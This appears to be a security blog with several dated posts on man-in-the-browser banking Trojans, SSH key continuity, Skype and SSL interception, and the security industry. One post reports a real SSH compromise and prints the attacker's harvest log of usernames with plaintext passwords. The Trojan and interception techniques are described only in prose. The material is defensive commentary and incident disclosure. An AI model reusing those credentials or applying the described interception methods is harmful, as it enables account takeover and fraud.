    This Trojan downloads a configuration file that contains the domain names of over 400 banks. Not only are the usual large American banks targeted but banks in many other countries are also targeted, including France, Spain, Ireland, the UK, Finland, Turkey—the list goes on.

    The ability of this Trojan to perform man-in-the-middle attacks on valid transactions is what is most worrying. The Trojan can intercept transactions that require two-factor authentication. It can then silently change the user-entered destination bank account details to the attacker's account details instead. Of course the Trojan ensures that the user does not notice this change by presenting the user with the details they expect to see, while all the time sending the bank the attacker's details instead. Since the user doesn’t notice anything wrong with the transaction, they will enter the second authentication password, in effect handing over their money to the attackers. The Trojan intercepts all of this traffic before it is encrypted, so even if the transaction takes place over SSL the attack is still valid. Unfortunately, we were unable to reproduce exactly such a transaction in the lab. However, through analysis of the Trojan's code it can be seen that this feature is available to the attackers.

    The Trojan does not use this attack vector for all banks, however. *It only uses this route when an easier route is not available*. If a transaction can occur at the targeted bank using just a username and password then the Trojan will take that information, if a certificate is also required the Trojan can steal that too, if cookies are required the Trojan will steal those....

    (spotted by JPM) MITB, MITM, two-factor as silver bullets for online banks, the node is insecure, etc etc.

    About the only thing that is a bit of a surprise is the speed of this attack. We first reported the MITB here around 2 years back, and we are still only seeing reports like the above. Although I said earlier that a big problem with the banking world was that the attacker can spin inside your OODA loop, it would appear that he does not take on every attack.

    See above for some limits: the attacker is finding and pursuing the attacks that are easiest, first. Is this finally the evidence that cryptographers cannot ignore? Crypto alone has proven to not work. It may be theoretically strong, but it is practically brittle, and easily bypassed. A more balanced, risk-based approach is needed. An approach that uses a lot less crypto, and a lot more engineering and user understanding, would be far more efficacious to deliver what users need.

    Posted by iang at 07:18 AM | Comments (2) | TrackBack

    February 20, 2008

    Principle of Redundancy

    In software engineering, it is important to remember the principle of redundancy. Not because it is useful for software, but because it is useful for humans.

    Human beings work continuously with redundancy because most human information processing is soft and fuzzy. How does a system deal with soft, fuzzy results? It takes readings from different sources, as little correlated as possible, and compares them. If three readings from independent sources all suggest the same conclusion, then we are good. If 2 out of 3 say good, then the human brain says "take care," and if only 1 out of 3 is good, then it is discarded.
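    In code, that 2-out-of-3 reading looks something like this (a minimal sketch of the idea, not of any particular system):

        def assess(signals):
            """signals: booleans from independent, uncorrelated checks."""
            good = sum(signals)
            if good == len(signals):
                return "proceed"
            if good == len(signals) - 1:
                return "take care"
            return "discard"

        print(assess([True, True, True]))    # proceed
        print(assess([True, True, False]))   # take care
        print(assess([True, False, False]))  # discard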

    In comments on the last post, Peter G explored the direct question of whether anyone checked the fingerprint of the SSH server:

    I tried to get some data a while back on SSH key checking in response to SSH fuzzy fingerprints (if you're not familiar with fuzzy fingerprints, they create a close-enough fingerprint to the actual target to pass muster in most cases). Because human-subject experimentation requires a lot of paperwork and scrutiny, I thought I'd first try and establish a base rate for SSH fingerprint checking in general. In other words if you set up a new server with a totally different key from the current one, how many people will be deterred?

    So I tried to establish the fingerprint-check rate in a population of maybe a few thousand users.

    It was zero.

    No-one had ever performed an out-of-band check of an SSH fingerprint when it changed.

    Given a base rate of zero, I didn't consider it worthwhile doing the fuzzy fingerprint check :-).

    What is going on here? Three things. First: for some reason that has never been explained, SSH has never made it easy to check the fingerprint. Like OpenPGP to some extent, the fingerprints have been delivered in incompatible formats across different channels. E.g., my known_hosts file says that a server I know is AAAAB3N.... and the only easy way to see the fingerprint is to simulate a compromise by clearing the cache.
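
    For the curious, the base64 blob and the fingerprint are mechanically related: the classic fingerprint is just the MD5 of the decoded key blob, printed as colon-separated hex. A few lines of Python make the point (newer OpenSSH can reportedly do the same with ssh-keygen -l -F host):

    import base64, hashlib

    def md5_fingerprint(known_hosts_line):
        # known_hosts format: "hostname keytype base64-blob [comment]"
        blob = base64.b64decode(known_hosts_line.split()[2])
        hexdigest = hashlib.md5(blob).hexdigest()
        # the classic colon-separated display, e.g. 05:a4:c2:...
        return ":".join(hexdigest[i:i+2] for i in range(0, len(hexdigest), 2))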

    Secondly, and the point of this post: the fingerprint is only one of the data points being displayed. In the last post, I talked about two other pieces of data: one was the failure of server-key matching, and the other was the fallback to password-request.

    The key lesson here is that SSH delivers enough information to do the job: it isn't the fingerprint per se, but the whole package of fingerprint, server-key matching, and the precise authentication mode.

    Three data points, albeit rather poorly presented. Which brings us to another point: in practice, this is only good enough in rare cases and experienced hands. That breach was only picked up because of the circumstances and a good dose of luck.

    This leads us to conclude that SSH is only just good enough, sometimes. Why? The argument is circular: because it has done the job well enough all these years, the security model has not been much improved beyond the original concept that knocked the theoretical MITM on the head. The third thing is then the lack of attacks -- now, however, circumstances are changing, and improvements should take place. (Indeed, if you take a longer perspective, you'll notice that the distros of SSH have been upgrading the security model over the last few years.)

    But the important upgrades should not be about forcing the fingerprint down the throats of the users. Instead, they should be in the area of redundancy: more uncorrelated, soft and fuzzy signals to the user, signals that work with the brain, not with the old 1990s computer textbooks.

    Hence, and to complete the response to Peter G, this is why the PKI apologists are looking in the wrong area:

    So there is a form of data available, but because it's not very interesting it'll never be written up in a conference paper (there's a longer discussion of fuzzy fingerprints and related stuff in my perpetual-work-in-progress http://www.cs.auckland.ac.nz/~pgut001/pubs/usability.pdf). I've seen this type of authentication referred to as leap-of-faith authentication in a few recent usability papers, and that seems to be a reasonable name for it. That's not saying it's a bad thing, just that you have to know what it is you're getting for your money.


    Yeah, we can all see "leap of faith" as a sort of mental trick to avoid really examining why SSH works and why PKI doesn't or didn't. That is, "oh, but because you make this 'leap of faith' you're not really secure, according to our models. So I don't have to think any more about it."

    The real issue here is again, it worked, enough, for the job. Now the SSH people will think more, and upgrade it, because it is being attacked. I hope, at least!

    The PKI people cannot say that. What they can say is "use TLS/SRP" or some other similar RFC acrophiliac verbiage which doesn't translate to anything a user can eat or drink. Hence, the simple answer is, "come back when I can use it."

    Posted by iang at 02:48 PM | Comments (1) | TrackBack

    February 17, 2008

    Say it ain't so? MITM protection on SSH shows its paces...

    For a decade now, SSH has successfully employed a simple opportunistic protection model that solved the shared-key problem. The premise is quite simple: use the information that the user probably knows. It does this by caching keys on first sight, and watching for unexpected changes. This was originally intended to address the theoretical weakness of public key cryptography called MITM or man-in-the-middle.
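
    The whole model fits in a few lines. A minimal sketch of key continuity, assuming the cache is persisted between sessions and the out-of-band check is left to the human (my illustration, not OpenSSH's actual code):

    known_hosts = {}   # host -> key; persisted to disk in real life

    def check_host_key(host, offered_key):
        cached = known_hosts.get(host)
        if cached is None:
            known_hosts[host] = offered_key   # first sight: cache it
            return "new host: key accepted on first use"
        if cached == offered_key:
            return "ok: key matches earlier sessions"
        # the interesting case: the key changed underneath us
        return "WARNING: key changed -- verify out of band before continuing"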

    Critics of the SSH model, a.k.a. apologists for the PKI model of the Trusted Third Party (certificate authority) have always pointed out that this simply leaves SSH open to a first-time MITM. That is, when some key changes or you first go to a server, it is "unknown" and therefore has to be established with a "leap of faith."

    The SSH defenders claim that we know much more about the other machine, so we know when the key is supposed to change. Therefore, it isn't so much a leap of faith as educated risk-taking. To which the critics respond that we all suffer from click-thru syndrome and we never read those messages, anyway.

    Etc etc; you can see that this argument goes round and round, and will never be settled until we get some data. So far, the data is almost universally against the TTP model (recall phishing, which the high priests of PKI have not addressed to any serious extent that I've ever seen). About a year or two back, attackers started paying attention to SSH, and so far it has withstood the attention with no major or widespread results. So much so that we hear very little about it, in contrast to phishing, which is now a 4-year flood of grief.

    After which preamble, I can now report that I have a data point on an attack on SSH! As this is fairly rare, I'm going to report it in fullness, in case it helps. Here goes:

    Yesterday, I ssh'd to a machine, and it said:

    zhukov$ ssh some.where.example.net
    WARNING: RSA key found for host in .ssh/known_hosts:18
    RSA key fingerprint 05:a4:c2:cf:32:cc:e8:4d:86:27:b7:01:9a:9c:02:0f.
    The authenticity of host can't be established but keys
    of different type are already known for this host.
    DSA key fingerprint is 61:43:9e:1f:ae:24:41:99:b5:0c:3f:e2:43:cd:bc:83.
    Are you sure you want to continue connecting (yes/no)?
    

    OK, so I am supposed to know what was going on with that machine, and it was being rebuilt, but I really did not expect SSH to be affected. The ganglia twitch! I asked the sysadm, and he said no, it wasn't him. Hmmm... mighty suspicious.

    I accepted the key and carried on. Does this prove that click-through syndrome is really an irresistible temptation and the Achilles heel of SSH, and that even the experienced user will fall for it? Not quite. Firstly, we don't really have a choice as sysadms: we have to get in there, compromise or no compromise, and see. Secondly, it is ok to compromise as long as we know it: we assess the risks and take them. I deliberately chose to go ahead in this case, so it is fair to say that I was warned, and the SSH security model did all that was asked of it.

    Key accepted (yes), and onwards! It immediately came back and said:

    iang@somewhere's password:

    Now the ganglia are doing a ninja turtle act and I'm feeling very strange indeed: The apparent thought of being the victim of an actual real live MITM is doubly delicious, as it is supposed to be as unlikely as dying from shark bite. SSH is not supposed to fall back to passwords, it is supposed to use the keys that were set up earlier. At this point, for some emotional reason I can't further divine, I decided to treat this as a compromise and asked my mate to change my password. He did that, and then I logged in.

    Then we checked. Lo and behold, SSH had been reinstalled completely, and a little bit of investigation revealed what the warped daemon was up to: password harvesting. And, I had a compromised fresh password, whereas my sysadm mates had their real passwords compromised:

    $ cat /dev/saux
    foo@...208 (aendermich) [Fri Feb 15 2008 14:56:05 +0100]
    iang@...152 (changeme!) [Fri Feb 15 2008 15:01:11 +0100]
    nuss@...208 (43Er5z7) [Fri Feb 15 2008 16:10:34 +0100]
    iang@...113 (kash@zza75) [Fri Feb 15 2008 16:23:15 +0100]
    iang@...113 (kash@zza75) [Fri Feb 15 2008 16:35:59 +0100]
    $

    The attacker had replaced the SSH daemon with one that insisted that the users type in their passwords. Luckily, we caught it with only one or two compromises.

    In sum, the SSH security model did its job. This time! The fallback to server-key re-acceptance triggered sufficient suspicion, and the fallback to passwords gave confirmation.

    As a single data point, it's not easy to extrapolate, but we can point in the direction it is heading:

    • The model works better than its absence would, for this environment and this threat.
    • This was a node threat (the machine was apparently hacked via dodgy PHP and last week's Linux kernel root exploit).
    • The SSH model was originally intended to counter an MITM threat, not a node threat.
    • Because SSH prefers keys to passwords (machines being more reliable than humans), my password was protected by the default usage.
    • Then, as a side-effect, or by easy extension, the SSH model also protects against a security-mode switch.
    • It would have worked for a real MITM, but only just, as there would only have been the one warning.
    • But frankly, I don't care: the compromise of the node was far more serious.
    • And we know that MITM is the least cost-effective breach of all: there is a high chance of visibility, and it is very expensive to run.
    • If we can seduce even a small proportion of breach attacks across to MITM work, then we have done a valuable thing indeed.

    In terms of our principles, we can then underscore the following:

    • We are still a long way away from seeing any good data on intercept over-the-wire MITMs. Remember: the threat is on the node. The wire is (relatively) secure.
    • In this current context, SSH's feature to accept passwords, and to fall back from key-auth to password-auth, is a weakness. If the password mode had been disabled, then an entire area of attack possibilities would have been evaded. Remember: There is only one mode, and it is secure. (A sketch of the relevant server configuration follows this list.)
    • The use of the information known to me saved me in this case. This is a good example of how to use the principle of Divide and Conquer. I call this process "bootstrapping relationships into key exchanges" and it is widely used outside the formal security industry.
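
    On that second point, the server-side fix is tiny. A minimal sketch for OpenSSH's sshd_config (directive names are OpenSSH's; check your vendor's defaults before relying on this):

    # /etc/ssh/sshd_config -- remove the password fallback entirely
    PasswordAuthentication no
    # also covers keyboard-interactive password prompts
    ChallengeResponseAuthentication no

    A root-level attacker can still install a warped daemon, but "please type your password" stops being a normal mode that users will accept.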

    All in all, SSH did a good job. Which still leaves us with the rather traumatic job of cleaning up a machine with 3-4 years of crappy PHP applications ... but that's another story.



    For those wondering what to do about today's breach, it seems so far:

    • turn all PHP to secure settings. Throw out all old PHP apps that can't cope.
    • find an update for your Linux kernel, quickly.
    • watch out for SSH replacements and password harvesting.
    • prefer SSH keys over passwords. The compromises can be more easily cleaned up by re-generating and re-setting the keys; they don't leapfrog so easily; and they aren't so susceptible to what is sometimes called "social engineering" attacks.
    Posted by iang at 04:26 PM | Comments (7) | TrackBack

    January 29, 2008

    Rumours of Skype + SSL breaches: same old story (MITB)

    Skype is the darling child of cryptoplumbers, the application that got everything right, could withstand the scrutiny of the open investigators, and looked like it was designed well. It also did something useful, and had a huge market, putting it head and shoulders above any other crypto application, ever.

    Storms are gathering on the horizon. Last year we saw stories that Skype in China was shipping with intercept plugins. 3 months ago I was told by someone who was non-technical that the German government was intercepting Skype. Research proved her wrong ... and now leaks are proving her right: Slashdot reports on leaked German memos:

    James Hardine writes "Wikileaks has released documents from the German police revealing Skype interception technology. The leaks are currently creating a storm in the German press. The first document is a communication by the Ministry of Justice to the prosecutors office, about the cost splitting for Skype interception. The second document presents the offer made by Digitask, the German company secretly developing Skype interception, and holds information on pricing and license model, high-level technology descriptions and other detail. The document is of global importance because Skype is used by tens or hundreds of millions of people daily to communicate voice calls and Skype (owned by Ebay, Inc) promotes these calls as being encrypted and secure. The technology includes interception boxes, key forwarding trojans and anonymous proxies to hide police communications."

    Is Skype broken? Let's dig deeper:

    [The document] continues to introduce the so-called Skype Capture Unit. In a nutshell: a malware installed on purpose on a target machine, intercepting Skype Voice and Chat. Another feature introduced is a recording proxy, that is not part of the offer, yet would allow for anonymous proxying of recorded information to a target recording station. Access to the recording station is possible via a multimedia streaming client, supposedly offering real-time interception.

    Nope. It's the same old bug: pervert your PC and the enemy has the same power as you. Always remember: the threat is on the node, the wire is safe.

    In this case, Mallory is in the room with you, and Skype can't do a darn thing about it, given that it borrows the display, keyboard, mike and speaker from the operating system. The forthrightness of the proposal and the parties to the negotiations would be compelling evidence that (a) the police want to infect your PC, and (b) infecting your PC is their preferred mechanism. So we can conclude that Skype itself is not efficiently broken as yet, while Microsoft Windows is, or more accurately remains, broken (the trojan/malware is made for the market-leading Microsoft Windows XP and 2000 only, not the market-following Linux/MacOSX/BSD/Unix family, nor the market-challenging Vista).

    No change, then. For Skype, the dream run has not ended, but it has crossed into that area where it has to deal with actual targeted hacks and attacks. Again, no news, and either way, it remains the best option for us, the ordinary people. Unlike other security systems:

    Another part of the offer is an interception method for SSL based communication, working on the same principle of establishing a man-in-the-middle attack on the key material on the client machine. According to the offer this method is working for Internet Explorer and Firefox webbrowsers. Digitask also recommends using over-seas proxy servers to cover the tracks of all activities going on.

    MITB! Now, normally we make a distinction between demos, security gossip, rumours and other false signals ... but the offer of actual technology by a supplier, with a hard price, to a governmental intercept agency indicates an advanced state of affairs:

    The licensing model presented here relates to instances of installations per month for a minimum of three months. Each installation of the Skype Capture Unit will cost EUR 3500, SSL interception is priced at EUR 2500. A one-time installation fee of EUR 2500 is not further explained. The minimum cost for any installation on a suspect computer for a comprehensive interception of both SSL and Skype will be EUR 20500, if no more than one one-time installation fee are required.

    This is the first hard evidence of professional browser-interference with SSL website access. Rumours of this practice have been around since 2004 or so, from commercial attacks, but nobody dared comment (apparently NDAs are stronger than crimes in the US of A).

    What reliable conclusion can we draw?

    • the cost of an intercept starts at EUR 2,500 per month, and is climbing.
    • the "delivery time" taken is a month or so, perhaps indicating the need to probe and inject into Windows.
    • MacOSX and Linux are safe for now, due to small market share and better security focus
    • Vista is safe today, for an unknown brew of market share, newness and "added security" reasons.
    • Skype itself is fine. So install your Skype on a Mac (if human) or a Linux box (if a hardcore techie).

    Less reliably, we can suggest:

    • All major police forces in rich countries will have access to this technology.
    • Major commercial attackers will have access, as well as major criminal attackers.
    • Presumably the desire of the police here is not to interfere with ordinary people's online banking, which they now could do, since most banking systems are still stuck on dual factor (memo to my bank: your super-duper advanced dual-factor system is truly breached by the MITB).
    • Nor, presumably, do they care about your reading of this blog or wikileaks, both being available in cleartext as well. Which means the plan to install *TLS/SSL everywhere to protect all browsing* is still a good plan, and is only held up by the slowness at Apache and Microsoft. (Guys, one million phishing victims every year beg you to hurry up.)
    • Police are more interested in breaching the online chat of various bad guys. So, SSL email and chat forums, Skype chat and voice.

    Of course the governance issue remains. The curse of governance says that power will be used for bad. When the good guys can do it, then presumably the bad guys can do it as well, and who's to say the good guys are always good? People who have lots of money should worry, because the propensity for well-budgeted but poorly paid security police in 1st world countries to manipulate their pensions upwards is unfortunately very real. Get a Mac, guys, you can afford it.

    In reality, it simply doesn't matter who is doing it: the picture is so murky that the threat level remains the same to you, the user: you now need to protect your PC against injection of trojans for the purpose of attacking your private information directly.

    Final questions: how many intercepts are they doing and planning, and did the German government set up a cost-sharing for payoffs to the anti-virus companies?

    Posted by iang at 05:46 PM | Comments (2) | TrackBack

    January 11, 2008

    #4.2 Simplicity is Inversely Proportional to the Number of Designers

    Still reeling at the shock of that question, it feels like time to introduce another hypothesis:

    #4.2 Simplicity is Inversely Proportional to the Number of Designers
    Never doubt that a small group of thoughtful, committed citizens can change the world. Indeed, it is the only thing that ever has. Margaret Mead

    Simplicity is proportional to the inverse of the number of designers. Or is it that complexity is proportional to the square of the number of designers?

    Sad but true, if you look at the classical best of breed protocols like SSH and PGP, they delivered their best work when one person designed them. Even SSL was mostly secure to begin with, and it was only the introduction of PKI with its committees, models, digital signature laws and accountants that sent it into orbit around Pluto.

    Sometimes a protocol can survive a team of two, but we are taking huge risks (remember, the biggest failure mode of all is failing to deliver anything). Either compromise with your co-designer quickly or kill him; your users will thank you for either. They do not benefit if you are locked in a deadly embrace over the pernickety benefits of MAC-then-encrypt over encrypt-then-MAC.

    It should be clear by now that committees are totally out of the question. They are like whirlpools, great spiralling sinks of talent, so paddle as fast as possible in the other direction. On the other hand, if you are having trouble shrinking your team or agreeing with them, a committee over yonder can be useful as a face-saving idea. Point them in the direction of the whirlpool, give them a nudge, and then get back to work.

    Posted by iang at 02:35 PM | Comments (3) | TrackBack

    What good are standards?

    Over at mozo, Jonath asks the most surprising question:


    My second question is this: as members of the Mozilla community, is this an effort that you want me (or people like me) participating in, and helping drive to final publication?

    Absolutely not, on several grounds. Here are some reasons, off the top of my head.

    Committees can't make security, full stop. Committees can write standards shaped like millstones around the neck, though.

    Standards are *not* indicated (in the medical sense) for UI, because the user is *not* a computer and does not and cannot follow precise rules like protocols.

    UI and security, together, probably require skills that are not easily available to your committee. Branding doesn't sit well with coding; architecture can't talk to lawyers. Nobody knows what a right is, and the number of people who can bring crypto to applications is so small that you won't find them in your committee.

    Security UI itself is an open research area, not an understood discipline that needs further explanation. Standards are indicated if you want to kill research, and move to promulgation of agreed dogma. This is sometimes useful, but only when the problems are solved; which is not indicated with phishing, now, is it?

    Although I have my difficulties with some of the research done, if you take away the ability to research from the community ("that's not standard!"), you've got nothing to tell you what to do, and the enemy has locked you down to a static position. (Static defence stopped working around the time of the invention of the cannon, so we are looking at quite some history here...)

    Anybody got any other reasons? Is there a positive reason here, anywhere?

    Posted by iang at 02:22 PM | Comments (0) | TrackBack

    January 08, 2008

    UK data breach counts another coup!

    The UK data breach a month or two back counted another victim: one Jeremy Clarkson. The celebrated British "motormouth" thought that nobody should really worry about the loss of the disks, because all the data is widely available anyway. To stress this to the island of nervous nellies, he posted his bank details in the newspaper.

    Back in November, the Government lost two computer discs containing half the population's bank details. Everyone worked themselves into a right old lather about the mistake but I argued we should all calm down because the details in question are to be found on every cheque we hand out every day to every Tom, Dick and cash and carry.

    Unfortunately, some enterprising scammer decided to take him to task and signed him up for a contribution to a good charity. (Well, I suppose it's good; all charities and non-profits are good, right?) Now he writes:

    I opened my bank statement this morning to find out that someone has set up a direct debit which automatically takes £500 from my account. I was wrong and I have been punished for my mistake.

    Contrary to what I said at the time, we must go after the idiots who lost the discs and stick cocktail sticks in their eyes until they beg for mercy.

    What can we conclude from this data point of one victim? Lots, as it happens.

    1. Being a victim in this *indirect* way continues to support the thesis that security is a market for silver bullets. That is, the market is about FUD, not security in any objective sense.
    2. (writing for the non-Brit audience here,) Jeremy Clarkson is a comedian. Comments from comedians will do more to set the agenda on security than any 10 incumbents (I hesitate to use more conventional terms). There has to be some pithy business phrase about this, like, when your market is defined by comedians, it's time for the, um, incumbents to change jobs.
    3. Of course, he's right on both counts. Yes, there is nothing much to worry about, individually, because (a) the disks are lost, not stolen, and (b) the data is probably shared so willingly that anyone who wants it already has it. (The political question of whether you could trust the UK government to tie its security shoelaces is an entirely other matter...)

      And, yes, he was wrong to stick his neck out and tell the truth.


    4. So why didn't the bank simply reverse the transaction? I'll leave that briefly as an exercise to the reader, there being two good reasons that I can think of, after the click.



    a. because he gave implied permission for the transactions by posting his details, and he breached implied terms of service!

    b. because he asked them not to reverse the transaction, as now he gets an opportunity to write another column. Cheap press.

    Hat-tip to JP! And, I've just noticed DigitalMoney's contribution for another take!

    Posted by iang at 04:13 AM | Comments (2) | TrackBack

    October 31, 2007

    Entire UK security industry is sent to Pogo's Swamp

    One of the enduring threads that has been prevalent on this blog but not in other places is that the problem starts with ourselves. Without considering our own mistakes, our own frauds, indeed our own history, it is impossible to understand the way security, FC, and the Internet are going.

    Compelling evidence is presented over at LightBlueTouchpaper. Not that their Wordpress blog was hacked (there but for the grace of God, etc etc), but where Richard Clayton asks why the Government rejected all the recommendations of the House of Lords report of a while back. Echoed over at Ianb's blog, and probably throughout the entire British IT and security industry. Why?

    Richard searches for an answer: Stupidity? Vested Interests? (On the way, he presents more evidence about how secrecy of big companies is part of the problem, not part of the solution, but that's a distraction.)

    We have good news: the lack of reflective thought is slowly diminishing. Over the last month I've seen an upsurge of comments: 1Raindrop's Gunnar Peterson says "One of the sacred cows that need to be gored is the notion that we in the People's Republic of IT Security have it all figured. We don't." Elsewhere Gunnar says "in many cases, they are spending $10 to protect something worth $5, and in other cases they are spending a nickel to protect something worth $1,000."

    Microsoft knows but isn't saying: Vista fails to clear up the security mess. Which means that they spent the last 5 years and got ... precisely nowhere. Forget the claim that Vista bombed in the security department ("short M$ ! buy Apple!") and consider the big picture: if Microsoft can throw their entire company at the issue of security, and fail, what hope the rest?

    Chandler (again) points to the Inquirer:

    Whose interests are really threatened by cybercrime? Well, certainly not the software makers, the chip makers, the hard disk makers, the mouse makers, and least of all the virus busters and security firms which daily release news of the latest “vulnerabilities” plaguing the web.

    No, the victims are the poor users. Not that they’re likely to have their identity stolen or their bank account plundered or their data erased by some malicious bot or other. The chances of that happening are millions to one.

    No, what they are forced to do is continually fork out for spam-busting protection, for “secure” operating systems, for funky firewalls, malware detectors or phish-sniffing software. All this junk clogs up their spanking new PC so that they continually have to upgrade to newer chippery clever enough to have a processing core dedicated to each of the bloatsome security routines keeping them safe while they surf.

    It’s a con, gentlemen. A big fat con.

    No one has a business interest in catching identity thieves or malware writers. There’s no money in it, so no-one’s bothered.

    Chandler then goes on to identify where the solution isn't, but let's not get distracted by that today. Some people, including John Q, pointed to Linus, who said:

    ... But the *discussion* on security seems to never get down to real numbers. So the difference between them is simple: [scheduling] is "hard science". The other one is "people wanking around with their opinions".

    Which rudeness strangely echoes the comment in 2004 or so by a leading security expert who stopped selling for a microsecond and was briefly honest about the profession.

    When I drill down on the many pontifications made by computer security and cryptography experts all I find is given wisdom. Maybe the reason that folks roll their own is because as far as they can see that's what everyone does. Roll your own then whip out your dick and start swinging around just like the experts.

    I only mention it because that dates my thinking on this issue. As I say, I've seen an upsurge in this over the last few months so I can predict that around now is the time that the IT security sector realises that not only do they not have a solution to security, they don't know how to create a solution for security, and even if they accidentally found one, nobody would listen to them anyway.

    If you have followed this far, then you can now see why the UK Government can happily ignore the Lords' recommendations: because they came from the security industry, and that's one industry that has empirically proven that their views are not worth listening to. Welcome to Pogo's swamp.

    Posted by iang at 07:39 AM | Comments (0) | TrackBack

    October 05, 2007

    Storm Worm signals major new shift: a Sophisticated Enemy

    I didn't spot it when Peter Gutmann called it the world's biggest supercomputer (I thought he was talking about a game or something ...). Now John Robb points to Bruce Schneier, who has just published a summary. Here's my paraphrasing:

    • Patience ...
    • Separation of Roles ...
    • Redundant Roles ...
    • No damage to host ...
    • p2p communications to control nodes ...
    • morphing of standard signatures (DNS, code) ...
    • probing (in military recon terms) past standard defences ...
    • knowledge of the victim's weaknesses ...
    • suppression of the enemy's recon ...

    Bruce Schneier reports that the anti-virus companies are pretty much powerless, and runs through a series of possible defences. I can think of a few too, and I'm sure you can as well. No doubt the world's security experts (cough) will spend a lot of time on this question.

    But, step back. Look at the big picture. We've seen all these things before. Those serious architects in our world (you know who you are) have even built these systems before.

    But: we've never seen the combination of these tactics in an attack.

    This speaks to a new level of sophistication in the enemy. In the past, all the elements were basic. Better than script kiddie, but in that area. What we had was industrialisation of the phishing industry, a few years back, which spoke to an increasing level of capital and management involved.

    Now we have some serious architects involved. This is in line with the great successes of computer science: Unix, the Internet, Skype all achieved this level of sophistication in engineering, with real results. I tried with Ricardo, Lynn&Anne tried with x9.59. Others as well, like James and the Digicash crew. Mojo, Bittorrent and the p2p crowd tried it too.

    So we have a new result: the enemy now has architects as good as our best.

    As a side-issue, well predicted, we can also see the efforts of the less-well architected groups shown for what they are. Takedown is the best strategy that the security-shy banks have against phishing, and that's pretty much a dead duck against the above enemy. (Banks with security goals have moved to SMS authentication of transactions, sometimes known as two channel, and that will still work.)

    But that's a mere throwaway for the users. Back to the atomic discussion of architecture. This is an awesome result. In warfare, one of the dictums is, "know yourself and win half your battles. Know your enemy and win 99 of 100 battles."

    For the first time in Internet history, we now have a situation where the enemy knows us, and is equal to our best. Plus, he's got the capital and infrastructure to build the best tools against us.

    Where are we? If the takedown philosophy is any guide, we might know ourselves, but we know little about the enemy. But, even if we know ourselves, we don't know our weaknesses, and our strengths are useless.

    What's to be done? Bruce Schneier said:

    Redesigning the Microsoft Windows operating system would work, but that's ridiculous to even suggest.

    As I suggested in last year's roundup, we were approaching this decision. Start re-writing, Microsoft. For the sake of fairness, I'd expect that Linux and Apple will have a smaller version of the same problem, as the 1970s design of Unix is also a bit out-dated for this job.

    Posted by iang at 07:07 AM | Comments (3) | TrackBack

    August 28, 2007

    On the downside of the MBA-equipped CSO...

    There is always the downside to any silver bullet. Last month I proposed that the MBA is the silver bullet that the security industry needs, and this caused a little storm of protest.

    Here's the defence and counter-attack. This blog has repeatedly railed against the mostly-worthless courses and certifications that are sold to those "who must have a piece of paper." The MBA also gets that big black mark, as it is, at the end of the day, a piece of paper. Saso said in comments:

    In short, I agree, CISO should have an MBA. For its networking value, not anything else.

    Cynical, but there is an element of wisdom there. MBAs are frequently sold on the benefits of networking. In contrast to Saso, I suggest that the benefits of networking are highly over-rated, especially if you weigh the cost of the MBA against the other networking opportunities forgone. But people indeed flock to pay the entrance price to that club, and if so, maybe it is fair to take their money; better the b-school than SANS? Nothing we can do about the mob.

    Jens suggests that the other more topical courses simply be modified:

    From what I see out there when looking at the arising generation of CSO's the typical education is a university study to get a Master of Science in the field of applied IT security. Doesn't sound too bad until we look into the topics: that's about 80% cryptography, 10% OS security, 5% legal issues and 5% rest.

    Well, that's stuffed up, then. In my experience, I have found I can teach anyone outside the core crypto area everything they need to know about cryptography in around 20 minutes (secret keys, public keys, hashes, what else is there?), so why are budding CSOs losing 80% of their time on crypto? Jens suggests reducing it by 10%; I would question why it should ever rise above 5%.
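
    To back that 20-minute claim, here is most of the syllabus in executable form; a sketch assuming Python and the third-party cryptography package for the public-key part:

    import hashlib, hmac
    from cryptography.hazmat.primitives.asymmetric import ed25519

    msg = b"pay 100 to bob"

    # Hashes: anyone can compute one; detects any change to the message.
    print(hashlib.sha256(msg).hexdigest())

    # Secret keys: only holders of the shared secret can make or check the MAC.
    print(hmac.new(b"shared-secret", msg, hashlib.sha256).hexdigest())

    # Public keys: sign with the private half, verify with the public half.
    private = ed25519.Ed25519PrivateKey.generate()
    signature = private.sign(msg)
    private.public_key().verify(signature, msg)   # raises on any tampering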

    Does the MBA suffer from similar internal imbalance? I say not, for one reason: it is subject to open competition. There is always lots of debate that one side is more balanced than others, and there is a lot of open experimentation in this, as all the schools look at each other's developments in curricula. There are all sorts of variations tuned to different ideas.

    One criticism that was particularly noticeable in mine was that they only spent around 2 days in negotiation, and spent more than that on relatively worthless IT cases. That may be just me, but it is worth noting that b-schools will continue to improve (whereas there is no noticeable improvement from the security side). Adam Shostack spots Chris Hoff who spots HBR on a (non-real) breach case:

    I read the Harvard Business Review frequently and find that the quality of writing and insight it provides is excellent. This month's (September 2007) edition is no exception as it features a timely data breach case study written by Eric McNulty titled "Boss, I Think Someone Stole Our Customer Data."

    The format of the HBR case studies are well framed because they ultimately ask you, the reader, to conclude what you would do in the situation and provide many -- often diametrically opposed -- opinions from industry experts.
    ...
    What I liked about the article are the classic quote gems that highlight the absolute temporal absurdity of PCI compliance and the false sense of security it provides to the management of companies -- especially in response to a breach.

    What then is Harvard suggesting that is so radical? The case does no more than document a story about a breach and show how management wakes up to the internal failure. Here's a tiny snippet from Chris's larger selection:

    Sergei reported finding a hole—a disabled firewall that was supposed to be part of the wireless inventory-control system, which used real-time data from each transaction to trigger replenishment from the distribution center and automate reorders from suppliers.

    “How did the firewall get down in the first place?” Laurie snapped.

    “Impossible to say,” said Sergei resolutely. “It could have been deliberate or accidental. The system is relatively new, so we’ve had things turned off and on at various times as we’ve worked out the bugs. It was crashing a lot for a while. Firewalls can often be problematic.”

    Chris Hoff suggests that the managers go through classic disaster-psychological trauma patterns, but instead I see it as more evidence that the CISO needs an MBA, because the technical and security departments spun out of corporate orbit so long ago nobody can navigate them. Chris, think of it this way: the MBAs are coming to you, and the next generation of them will be able to avoid the grief phase, because of the work done in b-school.

    Lynn suggests that it isn't just security, it isn't just CSOs, and is more of a blight than a scratch:

    note that there have been efforts that aren't particularly CSO-related ... just techies ... in relatively the same time frame as the disastrous card reader deployments ... there were also some magnificent other disastrous security attempts in portions of the financial market segment.

    My thesis is that the CSO needs to communicate upwards, downwards, sideways, and around corners. Not only external but internal, so domination of both sides is needed. As Lynn suggests, it is granted that if you have a bunch of people without leadership, they'll suggest that smart cards are the secure answer to everything from Disney to Terrorism. And they'll be believed.

    The question posed by Lynn is a simple one: why do the techies not see it?

